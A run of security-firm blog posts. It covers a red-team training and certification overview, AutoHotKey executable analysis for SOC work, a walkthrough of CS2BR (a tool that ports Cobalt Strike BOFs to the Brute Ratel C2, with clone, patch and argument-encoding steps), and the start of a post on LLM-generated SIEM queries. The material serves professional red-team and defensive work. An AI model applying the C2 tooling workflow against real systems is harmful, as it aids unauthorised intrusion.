File not found:  'group_mapper.json'. Please copy the  'group_mapper.json' to the same directory as this tool and try again.

Conclusion

This blogpost presented the BitSight Automation Tool as a valuable enhancement for organizations employing BitSight for performing external assessment and reducing exposure, as their solution.

Some key perks of this tool are as follow:

  1. Automates a lot of operations that otherwise are time consuming.
    1. Rating -> Retrieve the current score of an entity and confirm it’s above or equal to your company’s required security policies or digital mandate.
    2. Findings -> Generate a filtered list of vulnerabilities for an entity to remediate.
    3. Assets -> Retrieve the asset count and asset list of an entity, to validate your public IP space.
    4. Reverse Lookup -> Investigate where an IP, IP Range, domain or domain wildcard is attributed to and what IPs or domains it is associated with.
    5. Historical Ratings -> Sets up an overview of ratings for a given entity or group over a specified timeframe (maximum 1 year) to showcase in reports and review progress or regress.
  2. Allows the possibility to configure scheduled executions of the tool and create monthly/daily/yearly reports per your needs.
  3. Provides an easy to use command interface. It can also be compiled as an executable version to avoid having to install dependencies and to make it usable by anyone. (From analysts to CISO.)
Konstantinos Papanagnou

Konstantinos Papanagnou

Konstantinos is a Senior Cybersecurity Consultant at NVISO Security.

With a background in software engineering, he has an extensive set of skills in coding which helps him in day-to-day operations even in the Cybersecurity area. His motto; “Better spend 5 hours debugging your automation, than 5 minutes performing an automatable task”.

Unlocking the power of Red Teaming: An overview of trainings and certifications

31 July 2023 at 07:00
Title Image

NVISO enjoys an excellent working relationship with SANS and has been involved as Instructors and Course Authors for a variety of their courses:


As technology continues to evolve, so do the tactics and techniques used by cyber criminals. This means that staying up to date as a red team operator is crucial for protecting customers against the constantly changing threat landscape. Red team operators are tasked with simulating real-world attacks on a customer’s system to identify weaknesses and vulnerabilities before they can be exploited by malicious actors. By staying informed about the latest attack methods and trends, red team operators can provide more effective and relevant testing that accurately reflects the current threat landscape. Additionally, keeping up with emerging technologies and security measures can help red team operators develop new tactics and strategies to better protect customers from potential cyberattacks.

While red teams are primarily responsible for simulating attacks and identifying vulnerabilities, blue teams play a critical role in defending against these attacks and protecting an organization’s assets. Attending trainings that are typically attended by red teams can provide valuable insights and knowledge that blue teams can use to better defend their organization. By understanding the latest attack methods and techniques, blue teams can develop more effective defense strategies, identify potential vulnerabilities and patch them before they can be exploited by attackers. Additionally, attending these trainings can help blue teams better understand the tactics and tools used by red teams, allowing for more effective collaboration and communication between the two teams. Overall, attending red team training can help blue teams stay informed and prepared to defend against the constantly evolving threat landscape.

TL;DR;

If you do not have much time at hand, do not worry, the following tables may provide you a quick overview:

Certification NameBeginnerIntermediateExpert
Red Team Ops (CRTO1)🔑
Red Team Ops II (CRTO2)🔑
Certified Red Team Professional (CRTP)🔑
Certified Red Team Expert (CRTE)🔑
Certified Red Team Master (CRTM)🔑
Certified Az Red Team Professional (CARTP)🔑
Training NameBeginnerIntermediateExpert
Malware on Steroids🔑
Red Team Operations and Adversary Emulation (SEC565)🔑
Purple Team Tactics – Adversary Emulation for Breach Prevention & Detection (SEC699)🔑
RED TEAM Operator: Malware Development Essentials Course🔑
RED TEAM Operator: Malware Development Intermediate Course🔑
RED TEAM Operator: Malware Development Advanced – Vol.1🔑
Corelan “BOOTCAMP” – stack exploitation🔑

Disclaimer:

It is important to note that the certifications and trainings included in the review are not an exhaustive list of all the options available and are not in a specific order.
While the ones highlighted in the review are all excellent and worth considering, there may be other certifications and trainings that could also be beneficial for your specific needs and goals.
It is always essential to do your own research and carefully consider your options before deciding. Ultimately, the best certification or training for you will depend on your individual circumstances, interests, and career aspirations.

Certifications

Red Team Ops – CRTO1

The Red Team Ops 1 course is a very well done certification that teaches you the basic red team operator principles, adds handy tools for the beginning and shows techniques you will use as a red team operator.

You will learn how to start and configure the team server (in the course of the certification Cobalt Strike from FORTRA) as well as how to manage the listeners and touch the base of payload generation.

The certification is a must for beginners who want to learn how to go from the initial compromise, to moving laterally and in the end take over the whole domain.

Of course, Microsoft Defender (not Defender ATP/MDE), application whitelisting are also part of the course to prepare you for the much-needed evasion in the customer environments by using the artifact and resource kit available with Cobalt Strike.

Who should take this course?

If you are new to the game, this course is made for you! If you already have infrastructure security assessment experience, this course adds new attack paths to your inventory and includes some important tips for OPSEC which is a lot different in red team engagements to what you are known from an internal security assessment, where stealth is optional.

I enjoyed the exam a lot and in comparison to the price of SANS certifications, this is also a great opportunity for someone with a tighter budget, thanks Zeropoint Security!

Associated costs

365 GBP = 415,32 EUR = 452,89 USD (as of 04/04/2023)

The price includes the course materials as well as a voucher for the first exam attempt.

The RTO lab is sold as a subscription to those who have purchased the course.

The price is 20/40/60 GBP per month for 40/80/120 hours of runtime respectively.

Red Team Ops II – CRTO2

The Red Team Ops 2 course aims to build on the foundation of the Red Team Ops course in order to help you improve your OPSEC skills and show you ways to bypass more defense mechanisms.

Important to note here is, that this course is NOT a newer version or replacement of the first course.

The course will introduce the concept of public redirectors and rewrite rules to you, which can then be applied in the wild.

To help you understand the evasion techniques, some common Windows APIs are being covered as well as P/Invoke and D/Invoke which allow you to dynamically invoke unmanaged code and avoid API hooks.

Other indicators such as RWX memory regions and suspicious command lines will be treated with PPID and Command Line Spoofing.

Since Microsoft upped their game for security quite a bit, the Attack Surface Reduction should not be missed out on and as such is also included in this course with examples of how to bypass a subset of the default rules.

If you have struggled with Applocker in the past, welcome to the game. The bigger brother “Windows Defender Application Control (WDAC)” is waiting for you and allows the blue team to even better protect the environment.

The cherry on top of the course is the chapter treating different types of EDR hooks, syscalls and how to integrate goodies into the artifact kit.

Who should take this course?

If you already have completed the Red Team Ops 1 course this is a great addition to extend the knowledge gathered in the first round. In more mature environments you will face WDAC, EDRs from different providers and better blue team responses. Similar to the first course the price is very attractive and the hands-on experience in a lab and not just on paper is worth every dime.

If you think you already cover the first course with your knowledge, you can also jump to this one directly. The exam can cover parts of the first course to allow reconnaissance and privilege escalation/lateral movement, so I would not recommend going for CRTO2 without prior red teaming knowledge.

Associated costs

399 GBP = 453,86 EUR = 495,07 USD (as of 04/04/2023)

The price includes the course materials as well as a voucher for the first exam attempt.

The RTO II lab is sold as a subscription to those who have purchased the course.

The price is 15 GBP per month for 40 hours of runtime.

Certified Red Team Professional (CRTP)

The Certified Red Team Professional (CRTP) course provides you with a hands-on lab environment with multiple domains and forests to understand and practice cross trust attacks. This allows you to learn and understand the core concepts of well-known Windows and Active Directory attacks which are being used by threat actors around the globe.

Windows tools like PowerShell and others off the shelf features are being used for attacks to try scripts, tools and new attacks in a fully functional AD environment.

At the time of this blog post, the lab makes use of Microsoft Windows Server 2022 and SQL Server 2017 machines.

Lab environment (AD Attacks Lab (CRTP) (alteredsecurity.com))

Who should take this course?

If you are new to topics like Active Directory enumeration, how to map trusts of different domain, escalate privileges via domain attacks or Kerberos-based attacks like golden and silver tickets, this course is a good bet.

Additionally, the SQL server trusts and defenses as well as bypasses of defenses are covered.

Associated costs

The price depends on the practice lab access time that is bought:

30 Days – LAB ACCESS PERIOD – 249 USD ~ 227,58 EUR (as of 05/04/2023)

60 Days – LAB ACCESS PERIOD – 379 USD ~ 346,40 EUR (as of 05/04/2023)

90 Days – LAB ACCESS PERIOD – 499 USD ~ 456,08 EUR (as of 05/04/2023)

The course mentions the following content:

23 Learning Objectives, 59 Tasks, >120 Hours of Torture

https://www.alteredsecurity.com/adlab

Please keep in mind, that the certificate has an expiry time of three years and then needs to be renewed.

Certified Red Team Expert (CRTE)

After completing the Certified Red Team Professional (CRTP) you might be looking to explore more of Microsoft features that can be implemented in customer environments. This course will allow you to play with the Local Administrator Password Solution (LAPS), Group managed service accounts (gMSA) and the Active Directory Certificate Service (AD CS).

As customers often have resources in the cloud as well, Azure AD Integration (Hybrid Identity) and the attack paths therefore are presented in this course as well.

The person taking the course will learn to understand implemented defenses and how to bypass, for example: Just Enough Administration (JEA), Privileged Access Workstations (PAWs), Local Administrator Password Solution (LAPS), Selective Authentication, Deception, App Allowlisting, Microsoft Defender for Identity and more.

Lab environment (Windows Red Team Lab (CRTE) (alteredsecurity.com))

Who should take this course?

If you feel ready to dive into the more advanced defense mechanisms mentioned above, this course will certainly help you to identify these in an environment and navigate in a more mature environment covertly.

Associated costs

The price depends on the practice lab access time that is bought:

30 Days – LAB ACCESS PERIOD – 299 USD ~ 273,28 EUR (as of 05/04/2023)

60 Days – LAB ACCESS PERIOD – 499 USD ~ 456,08 EUR (as of 05/04/2023)

90 Days – LAB ACCESS PERIOD – 699 USD ~ 638,87 EUR (as of 05/04/2023)

The course mentions the following content:

28 Learning Objectives, 62 Tasks, >300 Hours of Torture

https://www.alteredsecurity.com/redteamlab

Please keep in mind, that the certificate has an expiry time of three years and then needs to be renewed.

Certified Red Team Master (CRTM)

The goal of this course is to compromise multiple forests with a minimal footprint, while gaining full control over the starting/home forest.

As consulting is more than just attacking infrastructure, the course also includes the submission of a report that contains details of attacks on target forests and details of security controls/best practices implemented on the starting/home forest.

Lab environment (Global Central Bank (CRTM) (alteredsecurity.com))

Who should take this course?

I would suggest this course if you want to put your technical knowledge to the test while also taking a step behind the lines of a blue team, as you need to document details of the security controls in place and how they could be mitigated best. This will help you to grow in the long term and make it possible to think like a defender in order to improve your evasion techniques.

Associated costs

The price depends on the practice lab access time that is bought:

30 Days – LAB ACCESS PERIOD – 399 USD ~ 364,68 EUR (as of 05/04/2023)

60 Days – LAB ACCESS PERIOD – 599 USD ~ 547,47 EUR (as of 05/04/2023)

90 Days – LAB ACCESS PERIOD – 749 USD ~ 684,57 EUR (as of 05/04/2023)

The course mentions the following content:

46 Challenges and >450 Hours of Torture

https://www.alteredsecurity.com/gcb

Please keep in mind, that the certificate has an expiry time of three years and then needs to be renewed.

Certified Az Red Team Professional (CARTP)

The Azure Active Directory is nowadays often used as an Identity and Access Management platform using the hybrid cloud model. It also allows on-prem Active Directory applications and infrastructure to be connected to the Azure AD. This step brings some very interesting opportunities to the plate, but with these also risks.

When talking about red teaming and penetration testing, these risks can be mapped onto the following phases: Discovery, Initial access, Enumeration, Privilege Escalation, Lateral Movement, Persistence and Data exfiltration. All of these phases are covered in the course. The most value for the customers results from not just identifying and abusing vulnerabilities in the environment, but also making clear suggestions for mitigations that can be implemented in the short or long term in the customer environment.

Lab environment (Attacking & Defending Azure AD Lab (CARTP) (alteredsecurity.com))

Who should take this course?

If you are a security professional trying to strengthen your skills in Azure cloud security, Azure Penetration testing or Red teaming in Azure environments, this is the right course for you!

Associated costs

The price depends on the practice lab access time that is bought:

30 Days – LAB ACCESS PERIOD – 449 USD ~ 410,38 EUR (as of 05/04/2023)

60 Days – LAB ACCESS PERIOD – 649 USD ~ 593,17 EUR (as of 05/04/2023)

90 Days – LAB ACCESS PERIOD – 849 USD ~ 775,97 EUR (as of 05/04/2023)

The course mentions the following content:

26 Learning Objectives, 77 tasks, 7 Live Azure Tenants, >140 hours of fun!

https://www.alteredsecurity.com/azureadlab

Please keep in mind, that the certificate has an expiry time of three years and then needs to be renewed.

Trainings

Malware on Steroids

https://0xdarkvortex.dev/training-programs/malware-on-steroids/

The course is dedicated to building your own C2 Infrastructure and Payload. To achieve that, an introduction towards Windows Internals which is followed by a full hands-on experience on building your own Command & Control architecture with different types of Initial Access payloads and their lifecycle such initial access, in-memory evasions, different types of payload injections including but not limited to reflective DLLs, shellcode injection, COFF injections and more, is being offered.

The course is offered in a time span of 4 days with 6-7 hours per day in an online interactive environment.

Lab environment (Dark Vortex (0xdarkvortex.dev)

Who should take this training?

If you always wanted to write your own C2 and create a dropper and stagers in x64 Assembly, C this course is perfect for you. Please keep in mind, that fundamental knowledge of programming with C/C++/Python3 and the familiarity with programming concepts such as pointers, references, addresses, data structures, threads and processes is listed as a requirement.

Associated costs

2,500 USD ~ 2281,95 EUR (as of 05/05/2023)

The price includes a certificate of completion, all the training materials including course PDFs/slides, content materials, source code for payloads and a python3 C2 built during the training program.

SEC565: Red Team Operations and Adversary Emulation

https://www.sans.org/cyber-security-courses/red-team-operations-adversary-emulation/

The SEC565 is one of the courses where you get to not only improve your technical abilities to abuse vulnerabilities, but also improve your skills around the whole engagement from planning to making sure the work you deliver follows a high quality and the best benefit for the customers.

The focus of the course is to learn how to plan and execute end-to-end Red Teaming engagements that leverage adversary emulation, including the skills to organize a Red Team, consume threat intelligence to map against adversary tactics, techniques, and procedures (TTPs), emulate those TTPs, report and analyze the results of the Red Team engagement, and ultimately improve the overall security posture of the organization.

The in person course is 6 days long for a reason. From planning the emulation to infrastructure and learning about initial access and persistence, the active directory attacks and ways to move from one compromised host to another is also included. As a red team documenting the abused vulnerabilities and obtaining the requested objectives is very important and therefore has a dedicated time slot as well.

The last block will contain a capture the flag red team lab consisting of 3 domains which includes Windows servers, workstations and databases as well as the active directory infrastructure to test the skills you learned earlier.

Who should take this course?

Defensive security professionals to better understand how Red Team engagements can improve their ability to defend by better understanding offensive methodologies, tools, tactics, techniques, and procedures.

Offensive security professionals looking to improve their craft and also improve their methodology around the technical part of the engagement (adversary emulation plan, safe sensitive data exfiltration, planning for retesting and more).

Associated costs

The course is being offered On-Demand (Online) and In Person.

The On Demand course is 8,275 USD ~ 7534.24 EUR (as of 02/05/2023)

The In Person course is priced at 7,695 EUR + OnDemand Bundle (785 EUR) = 8,480€ (as of 02/05/2023)

SEC699: Purple Team Tactics – Adversary Emulation for Breach Prevention & Detection

The SEC699 is one of the more unique courses where you get detailed insights into both red & blue team.

The course contents have been created by both blue teamers and red teamers and that is reflected in the detail of the course material.

The focus of the course is to learn how to emulate threat actors in a realistic enterprise environment and how to detect those actions.

As a proper purple teaming needs to follow a proper process, suitable tooling and planning, the course makes sure that these important parts are not missing. In-depth techniques such as Kerberos Delegation attacks, Attack Surface Reduction / AppLocker bypasses, AMSI, Process Injection, COM Object Hijacking and many more are being executed during the course and in order to grow on the challenge you will build SIGMA rules to detect these techniques.

Who should take this course?

Defensive security professionals looking to gain insights in the actual operation of carrying out attacks to understand the perspective of an attacker: Which tools are being used? What does a C2 setup look like? How does an attacker communicate with the C2 infrastructure? How can I use automation to my advantage?

Offensive security professionals looking to gain insights in logging & monitoring, which footprint and events are being generated using specific techniques and how the operational security can be improved to stay stealthier.

Associated costs

The course is being offered On-Demand (Online) and In Person.

The On Demand course is 7,785 USD ~ 7148.73 EUR (as of 04/04/2023)

The In Person course is priced at 7,170 EUR + OnDemand Bundle (785 EUR) = 7,955€ (as of 04/04/2023)

RED TEAM Operator: Malware Development Essentials

Malware, similar to software you use every day, has to be developed, and this course guides you through it.

Starting with what malware development is and how PE files are being structured, it helps you to understand how to encode and encrypt your payloads as well as how to store them inside a PE file.

Remote process injection as well as using an existing binary to backdoor is also being explained with hands-on code examples to follow and customize.

Who should take this training?

If you are getting started with developing your own loaders and stagers, this course is awesome to get the fundamentals right and gives you customizable source code that you can improve and build upon.

Associated costs

199 USD ~ 181,64 EUR (as of 05/04/2023)

A virtual machine with a complete environment for developing and testing your software, and a set of source code templates are included in the price.

RED TEAM Operator: Malware Development Intermediate

After the course “RED TEAM Operator: Malware Development Essentials” you might be wondering where to go next. This course uses the build foundation to extend the tooling with more code injection techniques, how you can build your own custom reflective binary as well as how to hook APIs in memory to monitor or evade functions.

Sooner or later, you have to migrate between processes that have loaded your shellcode so the section on how to migrate between 32- and 64-bit processes comes to the rescue. Finally, the course guides you on how to use IPC to control your payloads.

Who should take this training?

If you completed the course “RED TEAM Operator: Malware Development Essentials” and you are ready to take your skills to the next level, this course helps you to extend the kit you built in the first course.

Associated costs

229 USD ~ 209,03 EUR (as of 05/04/2023)

A virtual machine with a complete environment for developing and testing your software, and a set of source code templates are included in the price.

RED TEAM Operator: Malware Development Advanced – Vol.1

As the name of the course suggests, after the essentials and the intermediate course, the advanced course will teach you how to enumerate processes the modules and handles in order to identify a suitable process for injection. Payloads can not only be hidden in PE files and, as such, the course covers how to hide payloads in different parts of the NTFS, in the registry and in memory.

It demonstrates how any API (with any number of params) in a remote process can be called by using a custom “RPC” and how exception handlers can be abused.

You will learn how to build, parse, load and execute COFF objects in memory and much more.

Who should take this training?

After completing the Essentials and Intermediate course of the malware development series of Sektor7, I can only recommend this training to further strengthen your knowledge of how the Windows internals work and give you ideas for how to exploit them in the future.

Associated costs

239 USD ~ 218,15 EUR (as of 05/04/2023)

A virtual machine with a complete environment for developing and testing your software, and a set of source code templates are included in the price.

Corelan “BOOTCAMP” – stack exploitation

One thing to start with, the 2021 edition of the course is based on Windows 10/11 and contains an introduction to x64 stack-based exploitation in case you care for up-to-date material and operating systems.

Although the training is based on Windows 10/11, you have to start with the fundamentals by explaining the basics of stack buffer overflows and exploit writing.

The training provides you with a solid understanding of current stack-based exploitation techniques and memory protection bypass techniques. The training provider mentions that the course material is kept updated with current techniques, previously undocumented tricks and techniques, and details about research that was performed by the training author.

A small excerpt of the training contents:

  • The x86 environment
  • Stack Buffer Overflows
  • Egg hunters
  • ASLR
  • DEP
  • Intro to x64 stack-based exploitation

Who should take this training?

If you do like challenges, this training is for you. Anyone interested in exploit development or analysis is the target audience of this training.

The training itself does not provide solutions for any of the exercises that you will work through but instead provides help either during the course or after the course (via the student-only support system).

Associated costs

The In-Person training is listed at 2,500 EUR + 525 EUR VAT.

At the time of 05/04/2023 this is equal to 2738,89 USD + 575,17 USD VAT.

The path I chose to walk on

I started as a penetration tester / security consultant with a lot of self gained knowledge from home projects ranging from active directory setups at home to self built network attached storage and this helped me to have a good base with how to debug problems and general operating system usage.

During my security consulting path I then chose to start with the Offensive Security Certified Professional (OSCP) certification as this allowed me to understand some basic exploitation techniques and also get in contact with report writing and evidence collection.

Then there was a slight change in paths for dedicating my life to mobile security, but I always kept an eye on infrastructure security and did some projects in the mix.

After some years in the field, I knew I wanted a new challenge and decided to complete my CRTO1 certification.

I approached NVISO and after joining and the first larger projects I was hungry for more and completed my CRTO2 certification.

There are so many more trainings I have on my list, so keep it coming!

Education at NVISO

ARES assembles highly skilled expert professionals. This pool consists of people having 5+ years of experience in penetration testing and red team exercises, as well as blue team experts with knowledge on threat hunting and SOC operations.

The ARES team together currently holds the following certifications:

  • GPEN / GRID / GXPN / GCTI / GDAT / GCIA / GMOB
  • OSCP / OSEP / OSED / OSEE / OSWE / OSCE
  • CRTO1 / CRTO2
  • CRTP / CRTE / PACES / CARTP
  • eCPPTv2 / eWPTXv2
ARES Logo

Our ARES team at NVISO is dedicated to offer red team services to customers around the globe in order to identify gaps in the incident and response handling to improve the security posture of the companies many of us interact with daily.

See the ARES homepage for more information.

Steffen Rogge

Steffen is a Cyber Security Consultant at NVISO, where he mostly conducts Purple & Red Team assessments with a special focus on TIBER engagements.

This enables companies to evaluate their existing defenses against emulated Advanced Persistent Threat (APT) campaigns.

The SOC Toolbox: Analyzing AutoHotKey compiled executables

20 July 2023 at 07:00

One day, a long time ago, whilst handling my daily tasks, an alert was generated for an unknown executable that was flagged as malicious by Microsoft cloud app security.

When I downloaded the file through Microsoft security center, I immediately noticed that it might be an AutoHotKey script. Namely, by looking at the Icon, which is the AutoHotKey logo.

As with many unknown executables I like to inspect the executable in PE studio and look at the strings. URL patterns are a quick way to see if an executable could be exfiltrating if there was no obfuscation used.

In the strings section of PE studio there were multiple mentions of AutoHotKey, which confirmed my previous suspicions that this was indeed a AutoHotKey executable. A colleague of mine mentioned this YARA rule to detect AutoHotKey executables which could be used to identify this file.

AutoHotKey executable in PE studio

After a quick internet search I found the program Exe2Ahk (www.autohotkey.com/download/Exe2Ahk.exe) which promises to convert executables to AHK (AutoHotKey) scripts. However, this program did not work for me and I had to find another way to extract the AutoHotKey script.

Unsuccessful extraction using Exe2Ahk

Thanks to a form post on the Autohotkey forums. I found out that the uncompiled script is present in the RCDATA section of the executable. When inspecting the executable with 7zip, we notice that we can extract the script that is stored in the .rsrc\RCDATA folder. The AutoHotKey script is named: >AUTOHOTKEY SCRIPT<. The file can be extracted by simply dragging and dropping the file from the 7zip folder to any other folder on your pc.

RCDATA folder in 7Zip

Another website (where I unfortunately lost the URL to) mentioned that the same can be achieved via inspecting the file with Resource Hacker. Resource Hacker parses the PE file sections and can extract embedded files from those sections.

RCDATA folder in Resource Hacker

Once the file is extracted via your preferred method, you can open it in any text editor and start your analysis of the file, if you run in to any unknown methods or parameters used in the script or have difficulty with the syntax, the AutoHotKeys documentation can probably help you out.

In this case the file was not malicious, which is why we won’t go in more detail, but we have seen cases in the past where threat actors abused this tool to create malware.

Nicholas Dhaeyer

Nicholas Dhaeyer is a Threat Hunter for NVISO. Nicholas specializes in Threat Hunting, Malware analysis & Industrial Control System (ICS) / Operational Technology (OT) Security. Nicholas has worked in the NIVSO SOC solving security incidents for our MDR clients. You can reach out to Nicholas via Twitter or LinkedIn

Introducing CS2BR pt. II – One tool to port them all

17 July 2023 at 16:00

Introduction

In the previous post of this series we showed why Brute Ratel C4 (BRC4) isn’t able to execute most BOFs that use the de-facto BOF API standard by Cobalt Strike (CS): BRC4 implements their own BOF API which isn’t compatible with the CS BOF API. Then we also outlined an approach to solve this issue: by injecting a custom compatibility layer that implements the CS BOF API using the BRC4 API, we can enable BRC4 to support any BOF.

CS2BR really can port a whole bunch of BOFs!

I’m proud to finally introduce you to our tool CS2BR (“Cobalt Strike to Brute Ratel [BOF]”) in this blog post. We’ll cover its concept and implementation, briefly discuss its usage, show some examples of CS2BR in use and draw our conclusions.

I. The anatomy of CS2BR

The tool is open-source and published on GitHub. It consists of three components: the compatibility layer (based on TrustedSec’s COFFLoader), a source-code patching script implemented in Python and an argument encoder script (also based on COFFLoader). Let’s take a closer look at each of those individually:

The Compatibility Layer

As outlined in the first blog post, the compatibility layer provides implementations of the CS BOF API for the original beacons and also comes with a new coffee entrypoint that is invoked by BRC4, pre-processes BOF input parameters and calls the original BOF’s go entrypoint.

For practical reasons that become apparent further down this post, the layer is split into two files: one for the BOF API implementation (beacon_wrapper.h) and entrypoint (badger_stub.c), respectively.

The BOF API implementation borrows heavily from COFFLoader and adds some bits and pieces, such as the Win32 APIs imported by default by CS (GetProcAddress, GetModuleHandle, LoadLibrary and FreeLibrary) and a global variable for the __dispatch variable used by BRC4 BOFs for output. Note that as of this writing, CS2BR doesn’t implement the complete CS BOF API and lacks functions related to process tokens and injection, as those weren’t considered worthwhile pursuing yet.

The entrypoint itself, on the other hand, was built from scratch. Since BRC4’s coffee entrypoint can only be supplied with string-based parameters (whereas CS’ go takes arbitrary bytes), this custom one optionally base64-decodes an input string and forwards it to the CS go entrypoint. To generate the base64-encoded input argument, CS2BR comes with a Python script (encode_args.py, based on COFFLoader’s implementation) that assembles a binary blob of data to be passed to BOFs (such as integers, strings and files).

Patching source code

The compatibility layer alone only gets you so far though – it needs to be patched into a BOF somehow. That’s where the patcher comes in. It’s a Python script that injects the compatibility layer’s source code into any BOF’s source code. Its approach to this is simple and only consists of two steps:

  1. Identify original CS BOF API header files (default beacon.h) and replace their contents with CS2BR’s compatibility layer implementation beacon_wrapper.h.
  2. Identify files containing the original CS BOF go entrypoint and append CS2BR’s custom coffee entrypoint from badger_stub.c.

When I started working on the patcher’s implementation, I wasn’t sure just how tricky these two steps would be to implement: Would I need to come up with tons of RegEx’s to CS BOF API identify imports? Would I maybe need to parse the actual source code using the actual C grammar to find go entrypoints? Or would I need to compile individual object files and extract line-number information from their metadata?

Luckily, I didn’t have to deal with most of the above. The CS BOF API imports are consistently included as a separate header file called beacon.h, thus they can be found by name in most cases. To find the entrypoint, I wrote a single RegEx: \s+(go)\s*\(([^,]+?),([^\)]+?)\)\s*\{. Let’s briefly break it down using Cyril’s Regex Tester:

The regex used to identify the CS entrypoint in source code

The patterns matches:

  • “go” (optionally surrounded by whitespaces),
  • an open parenthesis denoting the start of the parameter list,
  • the first char* argument (which is any character but “,”),
  • the comma separating both arguments,
  • the second int argument (matching any character but the closing parenthesis),
  • the closed parenthesis denoting the end of the parameter list and
  • an open curly bracket denoting the start of the function definition.

This pattern allows CS2BR to identify the entrypoint, optionally rename it and reuse the exact parameter names and types. Once it identified the go entrypoint in a file, it simply appends the contents of badger_stub.c to the file. This stub contains forward-declarations of base64-decoding functions used in the custom coffee entrypoint, the new entrypoint itself, and the accompanying definitions of the base64-decoding functions. And that’s it – BOFs patched this way can now be recompiled and are ready to use in BRC4. If a BOF takes input from CNA scripts, one might need to use the argument encoder.

Encoding BOF Arguments

CS BOFs can be supplied with arbitrary binary data, and the first blog post showed that BRC4 BOFs can’t since their entrypoints are designed and invoked differently. To remedy this, CS2BR borrows a utility from COFFLoader and comes with a Python script that allows operators to encode input parameters for their BOFs in a way that can be passed via BRC4 into CSBR’s custom coffee entrypoint:

CS2BR's argument encoder

One drawback of using base64-encoding is the considerable overhead: base64 encodes 3 bytes of input into 4 bytes of ASCII, resulting in 33% overhead. As can be seen in the above screenshot, the raw data of about 6kB is encoded into about 8kB. The script also implements GZIP compression of input data, reducing the raw buffer to about 2.5kB and base64 data to about 3.5kB. As of this writing, however, CS2BR’s entrypoint doesn’t support decompression yet.

II. Using CS2BR

Using CS2BR is pretty straight-forward. You’ll need to patch & compile your BOFs only once and can then execute them via BRC4. If your BOFs accept input arguments, you’ll need to generate them via CS2BR’s argument encoder. Let’s have a look at the complete workflow.

1. Setup, Patching & Compilation

Again, we’ll use CS-Situational-Awareness (SA) as an example. First, clone SA and CS2BR:

git clone https://github.com/trustedsec/CS-Situational-Awareness-BOF
git clone https://github.com/NVISO-ARES/cs2br-bof/

Then, invoke the patcher from the cs2br-bof repo and specify the “CS-Situational-Awareness-BOF” directory you just cloned as the source directory (--src) to patch:

CS2BR's source code patcher

Finally, compile the BOFs as you would usually do:

cd CS-Situational-Awareness-BOF
./make_all.sh

That’s it, simple BOFs (such as whoami, uptime, …) that don’t require any input arguments can be executed directly through BRC4 now:

Executing a simple patched BOF without arguments

2. Encoding Arguments

In order to supply BOFs compiled with CS2BR with input arguments, we’ll use the encode_args script.

Let’s use nslookup as an exemplary BOF for this workflow. It expects up to three input parameters, lookup valuelookup server and type, as defined in CS-Situational-Awareness’ aggressor script:

alias nslookup {
	...
	$lookup = $2;
	$server = iff(-istrue $3, $3, "");
	$type = iff(-istrue $4, # ...
    ...
	$args = bof_pack($1, "zzs", $lookup, $server, $type);
	beacon_inline_execute($1, readbof($1, "nslookup", "Attempting to resolve $lookup", "T1018"), "go", $args);
}

The bof_pack call above assembles these variables into a binary blob according to the format “zzs” ($lookup and $server as null-terminated strings with their length prepended and $type as a 2-byte integer). This binary blob is disassembled by the BOF using the BeaconData* APIs.

BRC4 doesn’t support aggressor scripts, though, so CS2BR’s argument encoder serves as a workaround. As an example, let’s encode blog.nviso.eu for $lookup, 8.8.8.8 for $server and 1 for $type (to query A records, ref. MS documentation):

Encoding arguments for the nslookup BOF

The resulting base64 encoded argument buffer, DgAAAGJsb2cubnZpc28uZXUACAAAADguOC44LjgAAQA=, can then be passed to BRC4’s coffexec command and will be processed by CS2BR’s custom entrypoint and forwarded to the original BOF’s logic:

Running a patched BOF with generated input arguments

III. Where to go from here

Working on CS2BR has been a lot of fun and, frankly, also quite frustrating at times. After all, BRC4 isn’t an easy target system to develop for due to its black-box nature. This project has come a fairly long way nonetheless!

Conclusion

This blog post showed how CS2BR works and how it can be used. At this point, the tool allows you to run all your favorite open-source CS BOFs via BRC4. So in case you are used to a BOF-heavy workflow in CS and intend to switch to BRC4, now you got the tools to keep using the same BOFs.

Using CS2BR is straight-forward and doesn’t require special skills or knowledge for the most part. There are some caveats to it that should be considered before using it “in production” though:

  • Source code: CS2BR works only on a source code level. If you want to patch a BOF that you don’t have the source code for, this tool won’t be of much use to you.
  • API completeness: CS2BR does not (yet) support all of CS’s BOF C API: namely, the Internal APIs are populated with stubs only and won’t do anything. This mainly concerns BOFs utilizing CS’ user impersonation and process injection BOF API capabilities.
  • Usability: While CS2BR allows you to pass parameters to BOFs, you’ll still have to work out the number and types of parameters yourself by dissecting your BOF’s CNA. You’ll only need to figure this out once, but it’s a certain investment nonetheless.
  • Binary overhead: Patching the compatibility layer into source code results in more code getting generated, thus increasing the size of the compiled BOF. Also note that the compatibility layer code can get signatured in the future and thus become an IOC.

I’m convinced that most of those points don’t constitute actual practical problems, but rather academic challenges to tackle in the future. Overall, I think the benefit of being able to run CS BOFs in BRC4 outweighs CS2BR’s drawbacks.

Outlook

While I’m happy with the current implementation, I’m convinced it can be improved upon. Expect a third, final blog post about the next iteration of CS2BR. What is it going to be about, I hear you ask? Well, let me use a meme to tease you:

Teasing the next and final (?) blog post about CS2BR
That's me!

Moritz Thomas

Moritz is a senior IT security consultant and red teamer at NVISO.
When he isn’t infiltrating networks or exfiltrating data, he is usually knees deep in research and development, working on new techniques and tools in red teaming.

Transforming search sentences to query Elastic SIEM with OpenAI API

30 May 2023 at 09:48

(In the Blog Post, we will demonstrate a Proof-of-Concept on how to use a OpenAI’s Large Language Model to craft Elastic SIEM queries in an automated way. Be mindful of issues with accuracy and privacy before trying to replicate this Proof-of-Concept. More info in our discussion at the bottom of this article.)

Introduction
The primary task of a security analyst or threat hunter is to ask the right questions and then translate them into SIEM query languages, like SPL for Splunk, KQL for Sentinel, and DSL for Elastic. These questions are designed to provide answers about what actually happened. For example: “Identify failed login attempts, Search for a specific user’s login activities, Identify suspicious process creation, Monitor changes to registry keys, Detect user account lockouts, etc.”

The answers to these questions will likely lead to even more questions. Analysts will keep interrogating the SIEM until they get a clear answer. This allows them to piece together a timeline of all the activities and explain whether it is a false positive or an actual incident. To do this, the analysts need to know a bunch of things. First, they need to be familiar with several types of attacks. Next, they need to understand the infrastructure (cloud systems, on-premises, applications, etc.). And on top of all that, they must learn how to use these SIEM tools effectively.

Is GPT-3 capable of generating Elasticsearch DSL queries?
In this blog post, we will explore how a powerful language model by OpenAI can automate the last step and bridge the gap between human language questions and SIEM query language.

